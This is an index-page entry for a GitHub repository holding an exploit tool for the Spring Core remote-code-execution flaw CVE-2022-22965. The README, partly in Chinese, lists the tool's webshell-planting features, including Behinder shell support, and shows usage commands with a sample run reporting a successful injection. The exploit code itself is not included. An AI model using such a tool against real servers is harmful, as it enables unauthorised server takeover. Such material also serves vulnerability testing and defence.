Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/mr-xn/spring-core-rce
CVE-2022-22965 : about spring core rce
https://github.com/mr-xn/spring-core-rce
cve-2022-22965 spring spring-mvc spring-security
Last synced: 25 days ago
JSON representation
CVE-2022-22965 : about spring core rce
- Host: GitHub
- URL: https://github.com/mr-xn/spring-core-rce
- Owner: Mr-xn
- Created: 2022-03-30T14:35:00.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2022-04-01T15:34:03.000Z (over 2 years ago)
- Last Synced: 2023-03-04T18:38:12.944Z (almost 2 years ago)
- Topics: cve-2022-22965, spring, spring-mvc, spring-security
- Language: Python
- Homepage:
- Size: 14.8 MB
- Stars: 53
- Watchers: 1
- Forks: 18
- Open Issues: 0
-
Metadata Files:
- Readme: README.MD
Awesome Lists containing this project
README
## CVE-2022-22965: Spring-Core-Rce
## EXP
特性:
1. 漏洞探测(不写入 webshell,简单字符串输出)
2. 自定义写入 webshell 文件名称及路径
3. 不会追加写入到同一文件中,每次检测写入到不同名称 webshell 文件
4. 支持写入 冰蝎 webshell
5. 代理支持,可以设置自定义的代理,比如: http://127.0.0.1:8080使用:
```python3
$ python3 exp.py -h
usage: exp.py [-h] --url URL --type TYPE [--directory DIRECTORY] [--filename FILENAME]
[--proxy PROXY]Srping Core Rce.
optional arguments:
-h, --help show this help message and exit
--url URL target url,eg: http://127.0.0.1:8082/helloworld/greeting
--type TYPE 1 vuln test 2.Behinder shell
--directory DIRECTORY
shell directory,eg: webapps/ROOT(Notice: if the path not exists will creat!)
--filename FILENAME shell name
--proxy PROXY set request proxy,eg: http://127.0.0.1:8080```
比如:```bash
$ python3 exp.py --url http://127.0.0.1:8082/helloworld/greeting --type 1 --proxy http://127.0.0.1:8080
[*] waiting for 10s...
[+] inject success, vulnerable!
[+] test at: http://127.0.0.1:8082/inject30297.jsp
[*] Response:
challenge